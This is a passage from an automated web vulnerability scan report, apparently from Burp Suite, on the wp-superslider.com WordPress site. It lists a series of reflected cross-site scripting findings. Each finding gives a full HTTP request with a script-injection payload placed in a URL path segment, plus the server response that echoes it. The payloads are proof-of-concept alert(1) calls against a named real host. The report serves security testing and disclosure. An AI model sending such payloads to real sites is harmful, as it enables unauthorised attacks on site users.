Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data35ed6\"><script>alert(1)</script>d2c6d4601bc/superslider/ssBase/default/scroll.css" />
...[SNIP]...

4.289. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55124"><script>alert(1)</script>66807ffcd49 was submitted in the REST URL parameter 6. This input was echoed as 55124\"><script>alert(1)</script>66807ffcd49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider55124"><script>alert(1)</script>66807ffcd49/ssBase/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider55124\"><script>alert(1)</script>66807ffcd49/ssBase/default/scroll.css" />
...[SNIP]...

4.290. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7371b"><script>alert(1)</script>e47164d461b was submitted in the REST URL parameter 7. This input was echoed as 7371b\"><script>alert(1)</script>e47164d461b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7371b"><script>alert(1)</script>e47164d461b/default/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7371b\"><script>alert(1)</script>e47164d461b/default/scroll.css" />
...[SNIP]...

4.291. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b76a"><script>alert(1)</script>669576129ba was submitted in the REST URL parameter 8. This input was echoed as 7b76a\"><script>alert(1)</script>669576129ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7b76a"><script>alert(1)</script>669576129ba/scroll.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7b76a\"><script>alert(1)</script>669576129ba/scroll.css" />
...[SNIP]...

4.292. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2288a"><script>alert(1)</script>db427e6a945 was submitted in the REST URL parameter 9. This input was echoed as 2288a\"><script>alert(1)</script>db427e6a945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css2288a"><script>alert(1)</script>db427e6a945 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/scroll.css2288a\"><script>alert(1)</script>db427e6a945" />
...[SNIP]...

4.293. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1daa"><script>alert(1)</script>94f5a7e073c was submitted in the REST URL parameter 1. This input was echoed as d1daa\"><script>alert(1)</script>94f5a7e073c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sited1daa"><script>alert(1)</script>94f5a7e073c/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sited1daa\"><script>alert(1)</script>94f5a7e073c/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css" />
...[SNIP]...

4.294. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c82"><script>alert(1)</script>75b240e8597 was submitted in the REST URL parameter 2. This input was echoed as b7c82\"><script>alert(1)</script>75b240e8597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb7c82"><script>alert(1)</script>75b240e8597/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674536; expires=Thu, 02-Feb-2012 19:22:16 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:16 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb7c82\"><script>alert(1)</script>75b240e8597/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css" />
...[SNIP]...

4.295. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4723e"><script>alert(1)</script>03783ed291a was submitted in the REST URL parameter 3. This input was echoed as 4723e\"><script>alert(1)</script>03783ed291a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins4723e"><script>alert(1)</script>03783ed291a/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins4723e\"><script>alert(1)</script>03783ed291a/superslider/plugin-data/superslider/ssBase/default/tooltips.css" />
...[SNIP]...

4.296. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73db0"><script>alert(1)</script>62b356dcb5e was submitted in the REST URL parameter 4. This input was echoed as 73db0\"><script>alert(1)</script>62b356dcb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider73db0"><script>alert(1)</script>62b356dcb5e/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider73db0\"><script>alert(1)</script>62b356dcb5e/plugin-data/superslider/ssBase/default/tooltips.css" />
...[SNIP]...

4.297. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5241"><script>alert(1)</script>51d25023ca8 was submitted in the REST URL parameter 5. This input was echoed as d5241\"><script>alert(1)</script>51d25023ca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-datad5241"><script>alert(1)</script>51d25023ca8/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-datad5241\"><script>alert(1)</script>51d25023ca8/superslider/ssBase/default/tooltips.css" />
...[SNIP]...

4.298. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8644"><script>alert(1)</script>624f801cac1 was submitted in the REST URL parameter 6. This input was echoed as f8644\"><script>alert(1)</script>624f801cac1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/supersliderf8644"><script>alert(1)</script>624f801cac1/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674546+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider/plugin-data/supersliderf8644\"><script>alert(1)</script>624f801cac1/ssBase/default/tooltips.css" />
...[SNIP]...

4.299. http://wp-superslider.com/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7487f"><script>alert(1)</script>5f527290bee was submitted in the REST URL parameter 7. This input was echoed as 7487f\"><script>alert(1)</script>5f527290bee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7487f"><script>alert(1)</script>5f527290bee/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674548; expires=Thu, 02-Feb-2012 19:22:28 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
